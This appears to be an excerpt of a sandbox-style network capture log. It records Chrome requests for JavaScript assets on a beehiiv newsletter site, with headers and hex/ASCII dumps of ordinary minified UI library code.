                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3ac3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aac99b4339-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 34 38 64 36 32 33 32 2d 33 64 31 36 2d 35 36 32 38 2d 61 63 66 65 2d 36 64 36 65 33 30 33 38 66 62 38 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d48d6232-3d16-5628-acfe-6d6e3038fb83")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 61 20 61 73 20 49 65 7d 66 72 6f 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61 73 20 4e 65 2c 73 20 61 73 20 5f 2c 63 20 61 73 20 57 65 2c 45 20 61 73 20 67 65 2c 65 20 61 73 20 59 65 2c 4e 20 61 73 20 55 65 2c 6c 20 61 73 20 4b 2c 74 20 61 73 20 51 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 72 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4f 20 61 73 20 56 2c 4d 20 61 73 20 52 2c 61 20 61 73 20 76 65 2c 79 20 61 73 20 44 2c 4e 20 61 73 20 5f 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61 73 20 68 65 2c 74 20 61 73 20 6a 65 2c 75 20 61 73 20 56 65 2c
                                                                                                                                            Data Ascii: a as Ie}from"./keyboard-CaEu2o0u.js";import{n as Ne,s as _,c as We,E as ge,e as Ye,N as Ue,l as K,t as Q}from"./use-root-containers-DmyWFwuo.js";import{O as V,M as R,a as ve,y as D,N as _e}from"./use-is-mounted-BaHv16bB.js";import{n as he,t as je,u as Ve,
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 29 29 3b 6c 65 74 20 74 3d 6e 65 77 20 53 65 74 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 2e 63 75 72 72 65 6e 74 29 6e 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 74 2e 61 64 64 28 6e 2e 63 75 72 72 65 6e 74 29 3b 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 4a 65 3d 22 64 69 76 22 3b 76 61 72 20 77 65 3d 28 65 3d 3e 28 65 5b 65 2e 4e 6f 6e 65 3d 31 5d 3d 22 4e 6f 6e 65 22 2c 65 5b 65 2e 49 6e 69 74 69 61 6c 46 6f 63 75 73 3d 32 5d 3d 22 49 6e 69 74 69 61 6c 46 6f 63 75 73 22 2c 65 5b 65 2e 54 61 62 4c 6f 63 6b 3d 34 5d 3d 22 54 61 62 4c 6f 63 6b 22 2c 65 5b 65 2e 46 6f 63 75 73 4c 6f 63 6b 3d 38 5d 3d 22 46 6f 63 75 73 4c 6f 63 6b 22 2c 65 5b 65 2e 52 65 73 74 6f 72 65 46 6f 63 75 73 3d 31 36 5d 3d 22
                                                                                                                                            Data Ascii: ));let t=new Set;for(let n of e.current)n.current instanceof HTMLElement&&t.add(n.current);return t}let Je="div";var we=(e=>(e[e.None=1]="None",e[e.InitialFocus=2]="InitialFocus",e[e.TabLock=4]="TabLock",e[e.FocusLock=8]="FocusLock",e[e.RestoreFocus=16]="
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 75 69 2d 66 6f 63 75 73 2d 67 75 61 72 64 22 3a 21 30 2c 6f 6e 46 6f 63 75 73 3a 6b 2c 66 65 61 74 75 72 65 73 3a 63 65 2e 46 6f 63 75 73 61 62 6c 65 7d 29 2c 4f 28 7b 6f 75 72 50 72 6f 70 73 3a 45 2c 74 68 65 69 72 50 72 6f 70 73 3a 61 2c 64 65 66 61 75 6c 74 54 61 67 3a 4a 65 2c 6e 61 6d 65 3a 22 46 6f 63 75 73 54 72 61 70 22 7d 29 2c 21 21 28 69 26 34 29 26 26 66 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 65 2c 7b 61 73 3a 22 62 75 74 74 6f 6e 22 2c 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 66 6f 63 75 73 2d 67 75 61 72 64 22 3a 21 30 2c 6f 6e 46 6f 63 75 73 3a 6b 2c 66 65 61 74 75 72 65 73 3a 63 65 2e 46 6f 63 75 73 61 62 6c 65 7d 29 29 7d 6c 65 74 20 51 65 3d 50 28 4b 65 29 2c 4d 3d 4f 62 6a 65
                                                                                                                                            Data Ascii: ui-focus-guard":!0,onFocus:k,features:ce.Focusable}),O({ourProps:E,theirProps:a,defaultTag:Je,name:"FocusTrap"}),!!(i&4)&&f.createElement(se,{as:"button",type:"button","data-headlessui-focus-guard":!0,onFocus:k,features:ce.Focusable}))}let Qe=P(Ke),M=Obje
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 79 65 28 61 2c 70 29 3f 28 72 2e 63 75 72 72 65 6e 74 3d 70 2c 44 28 70 29 29 3a 28 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 44 28 75 29 29 3a 44 28 72 2e 63 75 72 72 65 6e 74 29 7d 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 2c 74 29 7b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 29 69 66 28 6e 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 65 21 3d 3d 30 7c 7c 31 2f 65 3d 3d 3d 31 2f 74 29 7c 7c 65 21 3d 3d 65 26 26 74 21 3d 3d 74 7d 63 6f 6e 73 74 20 6f 74 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63
                                                                                                                                            Data Ascii: HTMLElement?ye(a,p)?(r.current=p,D(p)):(i.preventDefault(),i.stopPropagation(),D(u)):D(r.current)},!0)}function ye(e,t){for(let n of e)if(n.contains(t))return!0;return!1}function rt(e,t){return e===t&&(e!==0||1/e===1/t)||e!==e&&t!==t}const ot=typeof Objec
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 7b 62 65 66 6f 72 65 28 7b 64 6f 63 3a 65 2c 64 3a 74 2c 6d 65 74 61 3a 6e 7d 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6f 29 7b 72 65 74 75 72 6e 20 6e 2e 63 6f 6e 74 61 69 6e 65 72 73 2e 66 6c 61 74 4d 61 70 28 6c 3d 3e 6c 28 29 29 2e 73 6f 6d 65 28 6c 3d 3e 6c 2e 63 6f 6e 74 61 69 6e 73 28 6f 29 29 7d 74 2e 6d 69 63 72 6f 54 61 73 6b 28 28 29 3d 3e 7b 76 61 72 20 6f 3b 69 66 28 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 21 3d 3d 22 61 75 74 6f 22 29 7b 6c 65 74 20 61 3d 6d 65 28 29 3b 61 2e 73 74 79 6c 65 28 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d
                                                                                                                                            Data Ascii: }function Et(){return je()?{before({doc:e,d:t,meta:n}){function r(o){return n.containers.flatMap(l=>l()).some(l=>l.contains(o))}t.microTask(()=>{var o;if(window.getComputedStyle(e.documentElement).scrollBehavior!=="auto"){let a=me();a.style(e.documentElem
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 74 79 6c 65 28 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6f 76 65 72 66 6c 6f 77 22 2c 22 68 69 64 64 65 6e 22 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 6c 65 74 20 74 3d 7b 7d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 29 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 6e 28 74 29 29 3b 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 4c 3d 76 74 28 28 29 3d 3e 6e 65 77 20 4d 61 70 2c 7b 50 55 53 48 28 65 2c 74 29 7b 76 61 72 20 6e 3b 6c 65 74 20 72 3d 28 6e 3d 74 68 69 73 2e 67 65 74 28 65 29 29 21 3d 6e 75 6c 6c 3f 6e 3a 7b 64 6f 63 3a 65 2c 63 6f 75 6e 74 3a 30 2c 64 3a 6d 65 28 29 2c 6d 65 74 61 3a 6e 65 77 20 53 65 74 7d 3b 72 65 74 75 72 6e 20 72 2e 63 6f 75 6e 74 2b 2b 2c 72 2e 6d 65 74 61 2e 61 64 64 28 74 29 2c 74 68 69 73
                                                                                                                                            Data Ascii: tyle(e.documentElement,"overflow","hidden")}}}function yt(e){let t={};for(let n of e)Object.assign(t,n(t));return t}let L=vt(()=>new Map,{PUSH(e,t){var n;let r=(n=this.get(e))!=null?n:{doc:e,count:0,d:me(),meta:new Set};return r.count++,r.meta.add(t),this
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 65 72 74 3d 75 2e 69 6e 65 72 74 2c 58 2e 64 65 6c 65 74 65 28 72 29 29 7d 6c 65 74 20 6c 3d 28 6e 3d 46 2e 67 65 74 28 72 29 29 21 3d 6e 75 6c 6c 3f 6e 3a 30 3b 72 65 74 75 72 6e 20 46 2e 73 65 74 28 72 2c 6c 2b 31 29 2c 6c 21 3d 3d 30 7c 7c 28 58 2e 73 65 74 28 72 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 29 2c 69 6e 65 72 74 3a 72 2e 69 6e 65 72 74 7d 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2c 72 2e 69 6e 65 72 74 3d 21 30 29 2c 6f 7d 2c 5b 65 2c 74 5d 29 7d 6c 65 74 20 6e 65 3d 73 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 28 29 3d 3e 7b 7d 29 3b 6e 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65
                                                                                                                                            Data Ascii: ert=u.inert,X.delete(r))}let l=(n=F.get(r))!=null?n:0;return F.set(r,l+1),l!==0||(X.set(r,{"aria-hidden":r.getAttribute("aria-hidden"),inert:r.inert}),r.setAttribute("aria-hidden","true"),r.inert=!0),o},[e,t])}let ne=s.createContext(()=>{});ne.displayName
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 73 65 53 74 61 74 65 28 30 29 2c 78 3d 73 2e 75 73 65 52 65 66 28 21 31 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 22 64 69 61 6c 6f 67 22 7c 7c 61 3d 3d 3d 22 61 6c 65 72 74 64 69 61 6c 6f 67 22 3f 61 3a 28 78 2e 63 75 72 72 65 6e 74 7c 7c 28 78 2e 63 75 72 72 65 6e 74 3d 21 30 2c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 60 49 6e 76 61 6c 69 64 20 72 6f 6c 65 20 5b 24 7b 61 7d 5d 20 70 61 73 73 65 64 20 74 6f 20 3c 44 69 61 6c 6f 67 20 2f 3e 2e 20 4f 6e 6c 79 20 5c 60 64 69 61 6c 6f 67 5c 60 20 61 6e 64 20 61 6e 64 20 5c 60 61 6c 65 72 74 64 69 61 6c 6f 67 5c 60 20 61 72 65 20 73 75 70 70 6f 72 74 65 64 2e 20 55 73 69 6e 67 20 5c 60 64 69 61 6c 6f 67 5c 60 20 69 6e 73 74 65 61 64 2e 60 29 29 2c 22 64 69 61 6c 6f 67 22 29
                                                                                                                                            Data Ascii: seState(0),x=s.useRef(!1);a=function(){return a==="dialog"||a==="alertdialog"?a:(x.current||(x.current=!0,console.warn(`Invalid role [${a}] passed to <Dialog />. Only \`dialog\` and and \`alertdialog\` are supported. Using \`dialog\` instead.`)),"dialog")
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 61 69 6e 65 72 73 3a 5b 4c 65 5d 7d 29 2c 53 65 3d 57 3f 22 70 61 72 65 6e 74 22 3a 22 6c 65 61 66 22 2c 6c 65 3d 77 21 3d 3d 6e 75 6c 6c 3f 28 77 26 6a 2e 43 6c 6f 73 69 6e 67 29 3d 3d 3d 6a 2e 43 6c 6f 73 69 6e 67 3a 21 31 2c 52 65 3d 61 65 7c 7c 6c 65 3f 21 31 3a 4e 2c 50 65 3d 73 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 7b 76 61 72 20 63 2c 79 3b 72 65 74 75 72 6e 28 79 3d 41 72 72 61 79 2e 66 72 6f 6d 28 28 63 3d 6d 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 62 6f 64 79 20 3e 20 2a 22 29 29 21 3d 6e 75 6c 6c 3f 63 3a 5b 5d 29 2e 66 69 6e 64 28 76 3d 3e 76 2e 69 64 3d 3d 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 70 6f 72 74 61 6c 2d 72 6f 6f 74 22 3f 21 31 3a 76 2e 63 6f 6e 74 61 69 6e 73 28 59 2e 63 75 72 72 65 6e 74 29 26 26
                                                                                                                                            Data Ascii: ainers:[Le]}),Se=W?"parent":"leaf",le=w!==null?(w&j.Closing)===j.Closing:!1,Re=ae||le?!1:N,Pe=s.useCallback(()=>{var c,y;return(y=Array.from((c=m?.querySelectorAll("body > *"))!=null?c:[]).find(v=>v.id==="headlessui-portal-root"?!1:v.contains(Y.current)&&


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            70192.168.2.1649796104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC550OUTGET /assets/index-CJHGmWl4.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2836
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"b14-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ab2d2d426d-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 31 38 64 62 66 31 64 2d 31 64 31 34 2d 35 34 36 39 2d 38 63 65 36 2d 65 63 65 66 39 30 66 64 62 65 38 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="018dbf1d-1d14-5469-8ce6-ecef90fdbe8e")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 69 65 72 22 2c 64 69 64 6f 74 3a 22 66 6f 6e 74 2d 64 69 64 6f 74 22 2c 67 61 72 61 6d 6f 6e 64 3a 22 66 6f 6e 74 2d 67 61 72 61 6d 6f 6e 64 22 2c 67 65 6f 72 67 69 61 3a 22 66 6f 6e 74 2d 67 65 6f 72 67 69 61 22 2c 68 65 6c 76 65 74 69 63 61 3a 22 66 6f 6e 74 2d 68 65 6c 76 65 74 69 63 61 22 2c 6c 6f 72 61 3a 22 66 6f 6e 74 2d 6c 6f 72 61 22 2c 22 6c 75 63 69 64 61 2d 63 6f 6e 73 6f 6c 65 22 3a 22 66 6f 6e 74 2d 6c 75 63 69 64 61 2d 63 6f 6e 73 6f 6c 65 22 2c 6d 65 72 72 69 77 65 61 74 68 65 72 3a 22 66 6f 6e 74 2d 6d 65 72 72 69 77 65 61 74 68 65 72 22 2c 6d 6f 6e 61 63 6f 3a 22 66 6f 6e 74 2d 6d 6f 6e 61 63 6f 22 2c 6d 6f 6e 74 73 65 72 72 61 74 3a 22 66 6f 6e 74 2d 6d 6f 6e 74 73 65 72 72 61 74 22 2c 22 6f 70 65 6e 2d 73 61 6e 73 22 3a 22 66 6f 6e 74
                                                                                                                                            Data Ascii: ier",didot:"font-didot",garamond:"font-garamond",georgia:"font-georgia",helvetica:"font-helvetica",lora:"font-lora","lucida-console":"font-lucida-console",merriweather:"font-merriweather",monaco:"font-monaco",montserrat:"font-montserrat","open-sans":"font
                                                                                                                                            2025-01-15 18:14:36 UTC1003INData Raw: 72 65 67 75 6c 61 72 22 2c 72 3d 3d 3d 22 6d 65 64 69 75 6d 22 26 26 22 66 6f 6e 74 2d 6d 65 64 69 75 6d 22 2c 72 3d 3d 3d 22 73 65 6d 69 62 6f 6c 64 22 26 26 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 2c 72 3d 3d 3d 22 62 6f 6c 64 22 26 26 22 66 6f 6e 74 2d 62 6f 6c 64 22 2c 72 3d 3d 3d 22 62 6c 61 63 6b 22 26 26 22 66 6f 6e 74 2d 62 6c 61 63 6b 22 2c 66 26 26 22 66 6f 6e 74 2d 67 61 72 61 6d 6f 6e 64 22 2c 6d 2c 64 3d 3d 3d 22 68 65 61 64 65 72 22 26 26 75 2c 64 3d 3d 3d 22 62 6f 64 79 22 26 26 62 29 3b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 22 70 22 3a 72 65 74 75 72 6e 20 73 2e 6a 73 78 28 22 70 22 2c 7b 73 74 79 6c 65 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 28 22 62 6f 64 79 22 29 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 3b 63 61 73 65 22 64 69
                                                                                                                                            Data Ascii: regular",r==="medium"&&"font-medium",r==="semibold"&&"font-semibold",r==="bold"&&"font-bold",r==="black"&&"font-black",f&&"font-garamond",m,d==="header"&&u,d==="body"&&b);switch(n){case"p":return s.jsx("p",{style:t,className:e("body"),children:o});case"di


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            71192.168.2.1649794104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC560OUTGET /assets/use-tree-walker-Inv4mdsP.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC904INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 868
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"364-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ab28b80cba-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC465INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 33 34 33 63 65 64 2d 65 31 64 39 2d 35 33 35 36 2d 62 64 30 65 2d 36 35 38 39 61 35 62 30 35 63 35 61 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51343ced-e1d9-5356-bd0e-6589a5b05c5a")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC403INData Raw: 28 72 29 2c 6e 3d 63 2e 75 73 65 52 65 66 28 74 29 3b 63 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6f 2e 63 75 72 72 65 6e 74 3d 72 2c 6e 2e 63 75 72 72 65 6e 74 3d 74 7d 2c 5b 72 2c 74 5d 29 2c 6d 28 28 29 3d 3e 7b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 64 28 65 29 3b 69 66 28 21 75 29 72 65 74 75 72 6e 3b 6c 65 74 20 61 3d 6f 2e 63 75 72 72 65 6e 74 2c 6c 3d 6e 2e 63 75 72 72 65 6e 74 2c 70 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 73 3d 3e 61 28 73 29 2c 7b 61 63 63 65 70 74 4e 6f 64 65 3a 61 7d 29 2c 69 3d 75 2e 63 72 65 61 74 65 54 72 65 65 57 61 6c 6b 65 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 2c 70 2c 21 31 29 3b 66 6f 72 28 3b 69 2e 6e 65 78 74 4e 6f 64 65 28 29 3b 29
                                                                                                                                            Data Ascii: (r),n=c.useRef(t);c.useEffect(()=>{o.current=r,n.current=t},[r,t]),m(()=>{if(!e||!f)return;let u=d(e);if(!u)return;let a=o.current,l=n.current,p=Object.assign(s=>a(s),{acceptNode:a}),i=u.createTreeWalker(e,NodeFilter.SHOW_ELEMENT,p,!1);for(;i.nextNode();)


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            72192.168.2.1649798104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC558OUTGET /assets/useIsLoggedIn-BbU3-q43.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
